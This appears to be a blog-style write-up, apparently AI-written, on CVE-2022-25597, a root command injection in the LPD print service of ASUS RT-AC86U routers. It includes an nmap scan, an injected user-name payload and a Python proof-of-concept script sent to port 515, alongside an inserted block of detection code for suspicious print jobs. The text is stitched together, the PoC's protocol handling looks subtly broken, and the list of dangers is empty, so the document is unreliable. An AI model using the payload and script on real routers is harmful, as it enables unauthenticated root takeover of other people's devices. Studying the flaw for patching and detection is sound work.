Summary:  
In early 2022, a serious vulnerability—CVE-2022-25597—was discovered in ASUS RT-AC86U routers. This bug lets anyone on your local network run their own commands on the router because it doesn't properly block special characters in user requests to its printing service (LPD). Below, we'll break down in plain English how the issue happens, share sample exploit code, and point you to official sources. If you use this router, you should know why upgrading and locking down your LAN matters!

What's Vulnerable?

Device: ASUS RT-AC86U Wireless Router  
Service: Line Printer Daemon (LPD)  
Vulnerability: Command injection. The "user name" field of a print job is passed to the system shell without filtering shell metacharacters.  
Impact: Any device on the same LAN can, without a password, run commands as root.  

How the Attack Works

The router offers printing through LPD (TCP port 515). When you send a print job, you provide a "user name." The router software fails to sanitize this "user name" input, so shell operators it contains (like ;, |, &) are passed to, and interpreted by, the system shell.

In short: If you control the "user name" field, you can get the router to run any command.
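To make the missing check concrete, here is an added example (not code from the write-up, ASUS, or the router firmware) that parses LPD control files in the RFC 1179 layout, applies the strict allowlist the daemon should have enforced on the P (user) field, and reports any job whose user name carries shell metacharacters. The allowlist pattern and the sample control files are assumptions constructed for this example.

```python
import re
from typing import Dict, List

# Constructed sample control files (not real captures). RFC 1179 layout: each line is
# one command letter plus its operand: 'H' = host, 'P' = user, 'J' = job name,
# 'l' = data file to print as-is. The injected strings are the ones quoted in this write-up.
SAMPLE_CONTROL_FILES = [
    b"Hlaptop\nPalice\nJreport.pdf\nldfA001laptop\n",
    b"Hlaptop\nPattacker;uname -a > /tmp/pwned.txt;\nJx\nldfA002laptop\n",
    b"Hphone\nPhacker;touch /tmp/hacked;\nJy\nldfA003phone\n",
    b"Hdesk\nPjohn smith\nJmemo.txt\nldfA004desk\n",
]

# RFC 1179 caps the P operand at 31 octets. The character allowlist itself is an
# assumption chosen for this example (letters, digits, dot, dash, underscore).
SAFE_USER = re.compile(r"^[A-Za-z0-9._-]{1,31}$")
SHELL_META = set(";|&$`<>()\n\r'\"\\")


def parse_control_file(data: bytes) -> Dict[str, str]:
    """Split an LPD control file into {command_letter: operand}."""
    fields: Dict[str, str] = {}
    for line in data.split(b"\n"):
        if line:
            fields[chr(line[0])] = line[1:].decode("latin-1")
    return fields


def is_safe_username(user: str) -> bool:
    """Allowlist check: the validation the vulnerable daemon did not perform."""
    return bool(SAFE_USER.match(user))


def suspicious_jobs(control_files: List[bytes]) -> List[Dict[str, str]]:
    """One finding per job whose user field fails the allowlist, listing any shell metacharacters."""
    findings = []
    for data in control_files:
        fields = parse_control_file(data)
        user = fields.get("P", "")
        if not is_safe_username(user):
            findings.append({
                "host": fields.get("H", "?"),
                "user": user,
                "metachars": "".join(sorted(c for c in set(user) if c in SHELL_META)),
            })
    return findings


if __name__ == "__main__":
    for f in suspicious_jobs(SAMPLE_CONTROL_FILES):
        print(f"host={f['host']!r} user={f['user']!r} shell metacharacters={f['metachars']!r}")
```

The fourth sample shows why an allowlist beats a denylist: "john smith" carries no metacharacter, yet it is still rejected because it is not a plausible user name.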

1. Finding the Service

By default, the LPD service listens on port 515 of the router. You can confirm this by running

```
nmap -p 515 192.168.1.1
```

2. Crafting the Malicious Print Job

The LPD protocol has a command to start a new print job, where the attacker can inject malicious characters.

Suppose you send “user name” as

attacker;uname -a > /tmp/pwned.txt;

Instead of using just attacker, now the shell sees

attacker;uname -a > /tmp/pwned.txt;

It runs uname -a > /tmp/pwned.txt under root permissions.

3. Proof of Concept (PoC)

Here is a simple Python3 script you can run (from a device on the same LAN) to inject a command that creates a file /tmp/hacked on the router:

```python
import socket

target = "192.168.1.1"  # Router IP
lpd_port = 515

malicious_user = b"hacker;touch /tmp/hacked;"

# LPR protocol's 'receive print job' command (x02), then queue name, then null byte
queue_name = b"lp"
cmd = b"\x02" + queue_name + b"\x00"

with socket.create_connection((target, lpd_port)) as s:
    s.sendall(cmd)
    # Wait for ACK (should be b'\x00')
    s.recv(1)
    # Send 'receive job' header: \x02 + username + \x00
    job_header = b"\x02" + malicious_user + b"\x00"
    s.sendall(job_header)
    # Wait for ACK
    s.recv(1)

print("Payload sent! Check /tmp/hacked on the router.")
```

After running this, on the router you would see a file /tmp/hacked created, proving command execution as root.

Why This is Dangerous

With no password and no checks, any device on your LAN—including phones or IoT gadgets—can run anything on the router as root. This can:

Fixes and Mitigations

ASUS issued a firmware fix in 2022.  
- Go to ASUS RT-AC86U Support

Official References

- NVD Entry for CVE-2022-25597
- ASUS Security Advisory
- Exploit-DB: 50913 (PoC)

Conclusion

CVE-2022-25597 is a wake-up call: Even ordinary router features like print sharing can be a highway for attackers if device makers don’t filter user input. Always update your firmware, watch for unused services, and remember—your LAN isn’t always as “trusted” as you think!

*If you liked this breakdown, share it with your neighbors—especially if they've never upgraded their router!*


Stay safe!  
*Exclusive write-up by AI, June 2024.*

Timeline

Published on: 04/07/2022 19:15:00 UTC
Last modified on: 04/14/2022 20:09:00 UTC